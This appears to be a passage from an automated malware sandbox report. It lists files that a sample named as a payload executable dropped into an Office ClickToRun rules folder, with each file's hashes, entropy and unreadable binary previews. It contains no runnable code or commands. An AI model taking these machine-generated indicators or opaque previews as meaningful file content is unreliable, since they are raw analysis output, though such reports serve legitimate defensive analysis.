                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703250v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1694
                                                                                                      Entropy (8bit):7.886218331167301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:7n/pGc1TIN4NnK9WkBKzUx+A3craCHKp1DyXC5w6zwD:7RGc1TINsnK0zI+YCHKphqCY
                                                                                                      MD5:D8D8CE687C56B4FEDE773AFE608D860C
                                                                                                      SHA1:1610193ABE25F78239323363D698D6A794308C6F
                                                                                                      SHA-256:B8973C60C420FF2BE341E9988E012C690F61284BD08E61294559E554428459A2
                                                                                                      SHA-512:4E44863FA66D66F13FD6049B583D31BAE169706DCB003BEA4D0493798AF84C82E1AD70ADDD94D87698C9F9097D01ED1995E173B8AF3D47F0DDD797F71CE4FA37
                                                                                                      Malicious:false
                                                                                                      Preview:.<?%.,......S.O........g...2~..T...S6h...v.f.mu...!.EH.M.L.X..E.b..P....1.Jl.....8.wb...>..8.>].!.W.!..q.{D..}%1zY.|.._.\.41...z.(n?)..w.(S..a..F.(.,.xd.l.Y.9.Q.:..Kf.... .....,..h.......NZ.x..@.c..c.....].f..IV...L...W:...'...`EP.c....XO...j.{..3.....n....?%.1r...u.emL.......K......M.#.$CB^{......d.t...._..;...}S.1xN|T..w...j..r......v/.P$#....!.J......J9.....U).{..J_2&.....C'.~.......&..g';.R...3<#...q......x.]......?y.......t......&..}.......H.....2..^.#...b..6E.>Ix.M..{|.8s.....0g.C.b..V)..2...."..&o.....\...x...l.....X....[.\Jq.......+$ J.s..&{6U...d..Z.^..Z..Q.".Xfo./L^3..bt.Vx..FY.s....Pd..im....o@......x].|t.=..i...Vx..\........JP@.2.=.w... ..R'.pev.xaRc..*"9.R....\...w.b.....~h..V.|.D.S....='].S......Px|..... ..4..W...h...$.VF..q...T...Lh.R1.\.....5<-=;?8.NA.+..wiZ2......L.......:,>....Y..3gQ8s.j`...{........Z#.b6Q.....N!..../..DOS...eb.7...'4S!8........i.,}^...oH.e.|D..-..(.A.i.~q...J.........h.-.O....@.....%.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703251v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1731
                                                                                                      Entropy (8bit):7.872995717279009
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:UMg2GRiT1oimt6f1yepbipKGLDdLIw6PtzI0JLpxyaep4xAQbW2QQeCap0C1K6pa:9GRi7mGMEbi5IZIGhCW0h0C1K6pY2wD
                                                                                                      MD5:C2647B15AF9B8667F0E502574BF31009
                                                                                                      SHA1:3CF90B6E9DF6F4551836F3FE3DB4ACD33F4AED45
                                                                                                      SHA-256:69D21A627141340AD7C31BB21DF8B8975F25D4CF92AE1F552F4BAAE64C92A7A5
                                                                                                      SHA-512:47DC2A29FAD54F27A7E64505221888BA4B91891148409576BE56C1BB717CA5F8C6E395B5D6B56BD6E774BF062BE8D9B4F9D03700B391F9FD9E673819D8191554
                                                                                                      Malicious:false
                                                                                                      Preview:.<?-....u..]..)g3;..P8....jc.3M..V.Y.[|tq`sul*W.a.7(...........CE....6.B..n..B.!...%t..XeH`"bH0XM...n.....xj...H.y.R..,f.z...mz./.<...hG+.">..D....P..]....l`..}..o5j.^,?;}%..,|....ahP...O.6.5......,t...Y.+..`e(@.B.....3....ol).....k?.G.b..u?............Ee.d9.i.Y..X?.......M..WJ..D.B)-.`i[....8C.....+7:6..x.lwfxP$s)>M..vWh......V.s.!.P.2..H.b^._..."9.H.1;.*.*m....#../..j...sV).d........F...V.$k...!.../..k...9u..*. &.."....{...Gh..wR.@...2d..._.y.8.A.-|~..n...5......l*.....%.t:.;%a...H..]......K..h.......vB.KL.u.n3o.Dd.vt......[J.d..50.)CI.D6.~J.-.^6.&......$..@&$].8].....*......s............. ...h.Z....0M.).!..t..!..%C...hX..W...aV!....1...@5jF...zx:..E.}..B.....&..#.....D.[..t..J.Ns:..f.K..i..@..c..M.....l.[..v...B.}..=:...f..$....94..Y.h.N.....].".u4...q..U./..O..T.....#'Z.....Zc./M.M".|.@U...$...u..s..].J....3.....%D..+n....2..>.(..r..V.....a...w.s..6......I....zPbh|...F.g..C.C3A.T.Sk.....8...u..#$,..)S.u...Z....'.q..^..UVQr...Kb

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703300v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.880574085044397
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:UebwYfDTb9cCjnzGqV/bFXOVbyAu+FxmNmAkRcndwD:URMb9NzGM/MVby/+wmAuJ
                                                                                                      MD5:6F77FF4CFD74F8076CDD79E90C755E77
                                                                                                      SHA1:8F0F62B0F2107B0DC7E937F10F4D26E19423D275
                                                                                                      SHA-256:DA688462BE04E83C40218B3892A11F1B22892F214BA43FA98859AE0C95A448FE
                                                                                                      SHA-512:908A2A1D9FB590A296C86CE5B21B9704B1B4491CF54E1703BA2499D0AA4125D1EA9D6148D6E94932CD177D5E5A81CFAF8A95618E2B53A7170A937851A952BE23
                                                                                                      Malicious:false
                                                                                                      Preview:.<?M.L.b.H.D.S|.c...M{..../..{.6s...7..F...b.... .*..Fk.:M..U.AL$..u..a..m.....-'c..Z..r.@<...._G.m..c4ha^.g-E.R?&nt?9R[.`oC.....=....).\G.I..)}.U..DK.Fy2i...-f.....i|...kfF....}X..^..z..d.,..(\.L.x....YK.i.BY.=..C......7K...2.:!"6....p..Z..L..P....c..g.|.q..}...nM.W{0j,...R.}.].0..E.4T.i.4.'..A..X@...&....).......0...*...[..4v_...5.^G~.....2...n..M...*Uo.^S{k.0.s.....C.=.F.L!4>.Y.....8..rN....\....D$.s..w.m.....0...qq*..\....Pni.../e..XrW..4YtZ...G......:A.l..}....O..p.<u..#p..n+....}.1...9......y.JSt...P..<.Q...I...b...Q5...._..2bDD....!tcr..N.^..y...e..;.6.W..R..\.H.!.P..-X.7@A.......<..c..U_..NS...a8.....U.aA!...........YD^Ier....@\+M..E..A...$I++;.I....4.|.,?......|K.wz..U(..e.<.$....$y...e. .^.&..8%Y..h..>.}..u..d.G...V...bo.P.V...;....'..,....l...b.t.qr..JN}.C..a/...d...5.'-..Sg........+M.V.LMqW.[.T...3..M...*.7<j...q....e..$z{.....e......Un.....$.L. ./:!.=....z%.U.u.m.#T)..n....^..!43.w.*.P.P.P..cAg...H.H..2....1'{I.q.G......rX...<\M..v.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703301v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1753
                                                                                                      Entropy (8bit):7.87639705695527
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zXVoBMoj3uVvO1xxadHE2wDrRMzqJGA1iWjn7TJyRo4926JGxH/VMzP4VUTRlrwu:26cuVNk2wDN+4L7TURoRHfKzAo6wgwD
                                                                                                      MD5:D10760E70ECF28B449F7CD014CA626CC
                                                                                                      SHA1:63E36869058AC2EBEF9DCE4374F53410593001AA
                                                                                                      SHA-256:88B662D6B55D336D1F2CF8B7ED753FFC3A7B6ACF294F24A19F59A86DF21B5924
                                                                                                      SHA-512:C2D2BD0329A376BAECCD4C5720DF30965F243B7637BF6016A2B9BA4398D9C91D15CAA05F892CB341B2F353A10469555063260F72CD2247CF440D0C51541E36DF
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...?n.....xNm..],..QO..,.02L..&r...HJ 0.....`...c#H.z9;.....5M......u-?.#....z.n:.ok3p.k.8..U...o..r./iJ.....Y..'.F.......Ro.QE|pT..R...R..[.#.A.......a.o..7K....b....RN..V....(k..v...E.R7&.v......3.....N..0y.!.....t...~..U.../.:.Y`..#....Nd.k./J..p\....&.Y..Wh.eveC.v].?.........u%3c.4..>...... .7.Qw.f......O....%.]=....wG.\N.uCl...&H...c}=.k'.}H&K.......W.9...../..0.........=q6..A.};... ..e...]m.a..<.....]r.........6>P..F.v.x.u.\.........s.3}..1.H....h995..Ubvf...v.n.|... ..."...:f...ph.,....!.*.3..c.L...z.H..].C/....... l..C..t.9C.]`.........v..6.....A...........[..]5..lQ.H....c%hY........x.....).C....q.9.:f.tD......*.!.d.Q.n.A.*o.|f...}.W..q.wb.G.3a....:s.V7..}.*f.Zq+4{..rn.....i.X..~....M...WE..w.S. P.5O.\......D..SG..rd..t........#..Ft.p.b[.}.KT..>.......k....Q.o..Fu...m..},.o.Rb.R..b,...J.*.....U.!. ..+....S1.....#Mr7.....~|Es...(6P..`.....4I..K....*mG`..t....t.dJ.A.Yd.....L.,.+..RD........j.R..9xC...J....o.....f.t.PJ:

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703350v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1700
                                                                                                      Entropy (8bit):7.881452699599128
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GwBHGhrVfgto/tp/T5Qud4RAdIhMx4A5at6/uwD:GMmhpIIXT5BdsAt5Cm
                                                                                                      MD5:23DC5348415ABE5A318CE990FC227A69
                                                                                                      SHA1:B819AF8227377ECA345428773095D8ECCA0A6E3B
                                                                                                      SHA-256:49DCF0592D69E9B421513557ECDFF4522AE5181871063960EFB27569099CC96B
                                                                                                      SHA-512:34104C43EA77DED50B92B266E4D0A1C292A3876E8C07C9E174951D0CBCF594EF911699F696091E8BF7CC05E8EF4FDEEB2217D6D89199C7328A960BE3A0B73ECE
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.._.k.G.b....2...Z.........qV..H.....!...d....)\]p.}|...<.Q.Q.~rW..W.W<.&x./....w.8iA<4....V/...C..8n.vt>..'..Ry..> \.w....#.)..".u......B.& *...v..MF{..=...........7..S.8K .{......o..(Oe.g.nM.......fd...].P..fs........n\..u.h....v2u....i.E......\.V.T%2..!sG.....q..=...u.257w....?.^|)r.S..8...Ea....K1...1.v-.MWs.yq.,q........f5x....H...`. ..@...R.~.fIJB......3.j..../K..\Gt.C...?/.3...c..}...#...R.W.......M....F...b.}kO}2x[.bC>.:$*.. .iA....^..aO...LI..?.G.)...%V6.HU.....E.....0>:=c[.N..a....w...@.r.Clw.<ot...*..$.._.}..>.J.u...&...c.OI....<..A..5[h;.....m.#..s...u\.m..\S.6.K..#..~..M@F...P....I.3.k.5...)......2......`.-..........AdS.w.@.g.[....!.O.,...z...b;....q...^.$....h.;.......)u.i.t....._..Rb.L...`.9...W......E......oF.,.eAZ....V..a.#..vQ.Vj......5^....j.F.59<.'.Y,N......:...SZ.r./2..i..,.<>`.....7.M.Q.(!."..*oe.......I1.D.(N.B....9....$.0r....J....{>......DK....h.h...F.a.J..RWNP.A..C....E.Q\Se..S.7....b.L..V..?N.^Nq.BV.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703351v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.866033101881787
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1tnZ9ms1gr3FHbOpSuRYDYaVNxxHE7UJXwD:zms1gTFeSAYlVNxxzc
                                                                                                      MD5:44F5872493E39D01503AA04B924DBE42
                                                                                                      SHA1:8465C784C071664EF8612F8A11A0E8543092A641
                                                                                                      SHA-256:4D9052BE749FE6D2866748C6F8AC7F4540A4C3B7177FC21B532948FF93201854
                                                                                                      SHA-512:3667A1C9864E9C16A7D23C4F4CDA09788A91B872E019CCC0FCEA715C5E4AA6A701238C36752E2682CE9477BF6B3B78F8D3166CE363D96CC3D80D32EB1000EE31
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...L...%.....{.<.B....J..0*.v....-A.....x...n.P^.>.....C......#'.%?I.bi/..N...i.......A..V.8$.....).......9.....1v?..hd. ..}.....)....}..i].........0oI......M..&O....fj....rA.).1..q.....0... ..e...L.......Xu........}L.b.d..,............0...8j..'*.}S..#.F..F.=b2L'.Z7$C.:.+G.s.Q].Q......f^...'.CE..N@.+%-0=.F.w...p.8.....F..&. s;.D......?.+.........+]G....p:.q,.S.W.vBLZ.j..B..E..XU\.%.'.K..H...fa.mL.<.......-u...!......u.+.<...H....<..K6F .vhb......n...}E....{v..o...0.3....<b.M.1...P.M.V...eS3'j...).E.F........v....H|.v.m.E...D2I.Y?j2....U^!...9nq..i..)S...M.....>3./...s....\t.O..u.x..V....M_.'......3.'..G.V.>..U%<.!-$..U..N.'Z.18Tab........|?.V....0..W4*.q.h.HO!..<....;.;~]0.f.....iZP..=.kB...1..k.t...h....$.;...$<...Y.....(.ytM....N.o....]......y.<s.....h..%WMj.>..d~..~..td.*.p.$.:..!~\........8q.%L..q.............`...2..T..G..x...4?......6.z...3.=...r.%N..5e.AV.........X..B.RKi.....L)..G...,O.{tV.Ef........6....aB....+....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703400v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1722
                                                                                                      Entropy (8bit):7.893302830221376
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:S6D0QoNHyNkvPay9AKEgde3mrpNXWsL9yiROhjwD:Z03HJr+Ck3mLf9oI
                                                                                                      MD5:F10E3BD3A500D6214E66BBDAC6359685
                                                                                                      SHA1:7B4464AB527EDBB7A2C2CCE8813787FD76430951
                                                                                                      SHA-256:1332B94E4E16CA35474419B74B41BEB088F14CFA7048EAA4E3443AE60D871B88
                                                                                                      SHA-512:0E7AE862DD0401B6B586D5A05CE7FBAAD97D55E20712BFF304811BA707B456FBEDBE41C37013F58FE4F0FD22C738F8485BFA8E89A1D652AA6950B29BECE57195
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...5..N....L4;HyT.{...F...Y...+q..:>r...z..&D...#..f.F_. S:........x.+....it..ZQ_..5..V.F.0f..ik7..u....v.....>..v[.X....B.'.@<.a-.p.Z...o..H.......v.e.L..O!....n.]V.?...C.M.ga5.,b^..K..r..8.f.kK.;....eK.).....Y..n.W2'.....1...@m9.~..o.v.2y..._Y..............z.....;.Un.a..!...+6.....N....o...(.|./..CI....+*.....AQ..A9.s...*Z.8.?.w.?w..%e.x.px.2...s...........?%HF.B,q.|..D.../.R..s....\V......E.>...r...L.Z.PN...9....^$M.K.P...G..D...6.N..............@d...U.\..[m...Q.....U.2.....ca)zW.z..U....$6%f.W.>.>.....h...@%..v.g...=....`A..33 {>G)..Z..n^....'.P~T.J.......U}<....Ts.....q....}..5.i.R}.. ...f0.+...P.Y4.(K......]p..2~...V8......&J.3]..##.x......b.....c(..y.6...M{~.PH.........GaL..zy...}N..Hn...z......?..)...G...........&.....b..Z..=...q.,.C.q.. @.U..........Y...^.......E.PAc..z.5E.@.`...5..........;.}wC....O..J.w..@.2......G..1ad...P...;!.......{..:q..\.up....c..!.......m..Z...'..o.W.d..ZQ..D9...o`%....JYTE..q..y.H.%.]%L@c...9..:.e......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703401v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1759
                                                                                                      Entropy (8bit):7.890661547851112
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:G7KbaxDIwBZcvHaBde9MULWLfBwdQr49xnTNplMXqGsITRQOwD:G7Km0EqHaBGMUSqdQr4vnxplDjMRe
                                                                                                      MD5:6D54A8F652F30522999C71E8D206386F
                                                                                                      SHA1:99757B42F8DEE86EEC1F16DF0CE95AF1D56DEC03
                                                                                                      SHA-256:00218C44F25453EE2A275F8EC1CDE2302256EDFACE923FAA7B177A359E50048E
                                                                                                      SHA-512:B365D604FD5C211D4D5CFD02ABAC964BA8EC5121AD5CF5A3CA15EE91204BC569AD2070697C9DDC64517FFF2BCFF806911E0B94F821FB6BA355423E340FF3D991
                                                                                                      Malicious:false
                                                                                                      Preview:.<?$....o.v.6=..9Q...V..@{.{......{.O..H....z*..A .c.L%.rObt1..6....|Z.EE.....&.u......9.....T.gr..a.h<......k.*Q.}T(...v.E....7.et.h.x..a*........3....1....aC.g.....\.8...=.e.l..l.H.....*2.*C7.Y..3...^0l.GG....|.-.Y[6..`....)..qTfo..S..H|...-c.....`.wh.......'wR.A.......&..f.I.M.~.$....U....o#EB....G|.F...Qa.N.;.uH...R...Q..m.$....r..t..+.......6)O.s..n.F..Kri.hP..$ ..@....0.m.......U..K..-uA.A(..W'.]....^.n.....c..T...qJ]......D..lH-..........M6s.U..".....:v........*.M..t.z<.'.@......A...x...e...y..=#.\.7...5....D.a..9....../..W.).f.t.<.*....F...3....=.C.(....`. ......../Z..Z_..uv........@...i..)rc....\6O....l.kpH0..-....6.d_....U..<......w[.M.hM#7...pLSS.Q".M.~......,.....:..'<..5..M.E..#..[+.J.m...Pi@@..*i@........i.%(...[..o...J!..|...IJ....v$.V.....N..!............%.....MG.u...V2.4...*..d.*..K:...j.S.c.&nf.m.Yv.....L.............>C....[..F@.m......<k."Nq.....l...].j.D..jL.....H...8.v..b..>K..\LP...mn".B..4U|...}.k.m./H...>z.A.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703450v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1706
                                                                                                      Entropy (8bit):7.884631406721096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:aq5UnzNgcjMimz7wU0UeDKE+nYhQnO47wD:aqkNEBz7wjDOYXj
                                                                                                      MD5:A79CDC418718104F9F322C8AEDF82687
                                                                                                      SHA1:DB4D93B3DE1C5F275C0BF7201CABAF03BCFF1FAE
                                                                                                      SHA-256:D6E317323E571FC031572A76AECFC080A204928DDAF1C74D4BF9799FF3EC4BF0
                                                                                                      SHA-512:6398446C76EECE97CEDE18950761B5CF8349934F316A4F48B7590DD6A8A42C0BF6C000CB6517D75D90311F763BCE62D6D8CD216BF8B38A5DB0474A600C59A021
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..H.k..A.....?.77.nO.-.c.aP..U.w...=.ju...Y.....!I.U...".C&.l`.<...`...l8.x.9/....3...'>...;]..H5..g...2~....{...18<...y.q.tk{...b.R..xz 5.R.`.h.b;R..1.......,V..y.t.O....t..+y.i/.A..9..3...r-.b,..o..iGp....n.%......t... .m.b%..]"(.^.m4.........2..\b.o;9o...(.....}..a..9..]o..:;...f.....!.m.I..&..'.... ..{.:Ii).@L....<..Y.v..C..V...,(.......5.z... .W.?PQX.Cy7..y.t...t.9...I./..x...8.s....Od.I%c8?.|.ec&..0.4..j.... Y..+...Fy.~E....\...2._...ON.w.4[....Wc;9...s..../.p.......D.....7C..s..].1...G..)>.L....jmD.Z............!I....V.X(djv.=.4.... .4.1. .}.5i.h....g.[..R..1B.Q,3.j.G+...\0.2..\..A`.2..&e..-.b0y..z."..l=>(...v..K$......:4...BA4.yy.+..s........,...M......]cfE.Q?.w..a.5.....r........d.._K..K...&.s'..]....[..6.. ....[~X.6sZ-]|.....U.!gw..y.+u.+&.~;)k.._.;.......m#..k......(;[.,;o.._7&...a...Y+1n..PS...A..e..W.z....'^<.#....N..;(&....6.d...Y-.MO.....B.M....(...p x..^D....i...{..!P..t.,b%j..}./y6.h!..[..(....d.,..J.p!..../h....+AA.L..i..v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703451v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1743
                                                                                                      Entropy (8bit):7.896866035131578
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:CaRBLZeOs2c/ekCZ1ps8at0VWdukndOupdwD:CaRBAL200pshaTkdOgO
                                                                                                      MD5:62A47F17DF28F86CDE0BF752F256AD82
                                                                                                      SHA1:D51D601CBB8E3E3BD38812F53C36723127B95C92
                                                                                                      SHA-256:30754F4C9A7802CAA87A6CCA8ABDFEE50C265A827A869325C81F1FA9CE40420A
                                                                                                      SHA-512:B2F6532912D87A2EB77DFA89AF3115D002D3089099160C6306CEBD77A7682ECCC38AA6599417F0470175A3229F7EABCC5DB5C6CD1A46F4C92A26A55B33E037ED
                                                                                                      Malicious:false
                                                                                                      Preview:.<?&..3....c...w.c.........l...VL.......7.. xg}.|.T...>.NM.)iOq@........-....8b5[..@....".3....x$.......+/......7..%.E..gp.....'X.......j....X.........8..#..Q...b.r....Q....Q!.X..gz&..Q....w...3.OxzN.......N.U.3...3?.|._...........[.0...j.....CH.....=..I....y..D?..6Y...@"C. X...Q.6#.P.......IN..l.K.2..-..w.P..].l./"3U1%......T~...p...9.S....w.#...Y&..~.........5.+..O9.E.D=j.=.[...pkH.B..hL.4............K...#..swz.........I.....}z.Eb..rJ..*..*./t......|..+....k.W.I..........!..j..fgG..Q..T.VZ..F...5C...1..J.6K.....rK.6}..*;.-1...3..'J4.,q w......}eW...NQj#...o....8Z/.8.t....Iy..@.y.m[[.<...>.ELJ,r..w...._H5..t.z.;.C.V...-......K...K0e..yg.......n....|G.5}WQ..q.J..$....@......e..&..l...G..r..w.....N..qCF.-?y...;.RA.M..] ....."..W...Q..x.Q.&..%.@...R.n3_qFYc.. h......].\.}a*[....(.9.=A(.X`..\_..b...o.....s.....@..0.9.M.....@.wS..Z...N....{...v..8yK..7-a............?.h..J.5..%...c..Ki1..D.f,.....t}.......8.F]...v.Cl..s...6".h...#..%.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703500v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.879394155832242
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ys8R9n7Y2IL+1z6AiNzXBeXZDNujoKD7dnClATp1+Mes8rYId0fbCR6A87z0ezcs:Ys8L757zti9CGEOH+b/rYjbCeseowD
                                                                                                      MD5:4CABC3AB69282BB6020417CC634B8C77
                                                                                                      SHA1:EDD7EFD94F77389F947D23D911FC8F552133D8B1
                                                                                                      SHA-256:C69244F342884BC0FE7054A6F4B76EDA6C251B3D93702A5E7390E77D4DF7B72D
                                                                                                      SHA-512:1EC133424F484791CE1439E24A7AEDC4864950C3CB0CA09B86D6FD22DDC0548113CE83066ED4B6D78142B8CA563FEF7D0E4BEB7B114A4E4CB93F3AE7EB2ACB87
                                                                                                      Malicious:false
                                                                                                      Preview:.<?'<.r?...$.....S.s.....,.R..(.0t0.s.../gA...e.."6....r...;b....eW....f..o.|..#{...zQ.x...b........P..V..I&.v3..c.h...z.#.e.........g.9&S..0.....Sz..>......n...%......R.A....k.T......dL..AJ...'Q.d.].. V._U......GY.r\.R..e........i...K....Q.2..d............d......n.(..}#m.-..b.r...Q....C.9.B...0.m.3.L.."..N9v..4.t.wkp.yS.......O.Z..........T|M.cF.....?A3..'R..n....6..Y&%.........][..N.b+Qb....!........G|..-.M....!.s.".xqlH.....w}.....{F%...3R...b.k....l..IC........+1X.j8u.}..._....r.X...4r9../8B..:Y.+Z].v...u.Bw,.....o.t.#...".t.......q..C. .Ar......q.....j>y.d......y(...ytn.^....n..c-.Fd..9F..,....xC.s.o. I2..&....e8.O.@.@...p.gn&....8q....g.y.%.t.}g.<Qv..H..h.<.x..:.i.heZ...*.5..b.$Qd..).O.....X..&.T....%.../{X....e....B.K.3.G.4...\....1.H...+.......02.f..@..B....pK.....@.qL.9.2F.d.....l..p.q.v..W...T.......G..&......g..A..'...[n.......*..-.$..3a.@.'M......u..7...........a...l].a.)....ei.."..d......5..i.w....74[..IU9,....%.t.js

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703501v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.875674900730876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:In7kmWSDvu7/5ZLUc2m3F35yumPcDzDVaey0wD:I7kcDm7hRUc1B5yumPcvpsN
                                                                                                      MD5:7B3F6CE82666B52B053F93056F5B0D68
                                                                                                      SHA1:5AA8A8E3613F2C4EFBB141D28F032DA3C54D5D3A
                                                                                                      SHA-256:9D4043BC3C646BABAFE1A5ED5EC59A9636E2937BB7DC280B90E63488D28F8B92
                                                                                                      SHA-512:49294BA6A622A45A3D0D14F3B71F3D5EC5351E9F76F767CDE52F134C84AF3F5C9956F09D70FEB669A133EB8848D52B92D7C734D766F15B5E14E9461DF76DE104
                                                                                                      Malicious:false
                                                                                                      Preview:.<?p.1;.Rc...F.N..#._...b......m(.1.>#..D.a`k...^....c ...[...P.`....rs624(.u:]....qH..Q.....X&.P..6.."w...".>$e...YV...~w...*.`.._....'.m?..'..v.......[.$fw..".=<.b9..{...Y.5..4.....Q..l3...?.MV...dg{svNS.b..v..y.N.X.......r..l.R..2.m#....T....@<..K.5=..F..L.....l1Y.n%T...K.).d...).c.YQ.Q:..V..O.PH..K.........|..j._|..G.7...IH[.......%....4c.W.U>G..3n.G.......dC..U.F&...kG.K.....R..`.I.....G.C..D.c...*.9..3..<G..-..$.6...Z.=?.P-...?..".t[....nV..oVU.^8..,...Z.>19.......|Cj."QOtt.e5...X...........b...9g.K..0j..]&......Hh..x6.l.<.c..Uo3>.'\~.2..q..!.o).@X A7)&..s9.MXG.bG.%..[.....w...`.Dm.....orzi`...)/.....l..o.:(Y.`..2CD..d.!....o^*\...]C.....!....y...,..K.6_.Y.s.0.p..pp...5..%..|...xY..8~.,..~......D;K.l.^_.....=i....f.....2.....vo.F-.5b..g* ...7..i...W{...i....j.a..,,...f5j...}e....-.3...t./..>..t$P.\..-..h.^..[7....3.$$.......4O...W..2_.'..?3...N....}f....J..;FoU.If@....w.6.r{.s!:...C.....<3..;CpC....)...+.n..2Y0.6^w.,.As...T

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703550v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1706
                                                                                                      Entropy (8bit):7.892227985331389
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:EjX+RdYiFLARlC3zs+k91vtLFlV3qkpxsX1sTGmwaf6Nr7tfeoXqpetYcQ9feavk:EjuRdYKw0Mxx3Hxw1sTSXlqf5eawD
                                                                                                      MD5:F9505884604AAE3BC1FAF38AF68A8387
                                                                                                      SHA1:251DCAB62074F0168C3D2232F0658FEA75C93919
                                                                                                      SHA-256:1DDB3A7235DFA0D4C7DE151DDB581CB2E0E34F12B0627CF7003EF4FE6271353D
                                                                                                      SHA-512:F9E5C6DBCF3404A03B9559FDE4C58471429E931CBF8E46C27867D66EBC604131AAB250DD91F9BF65123687B194BBEB948C3E36A3D75927446BF9A104945A5ADE
                                                                                                      Malicious:false
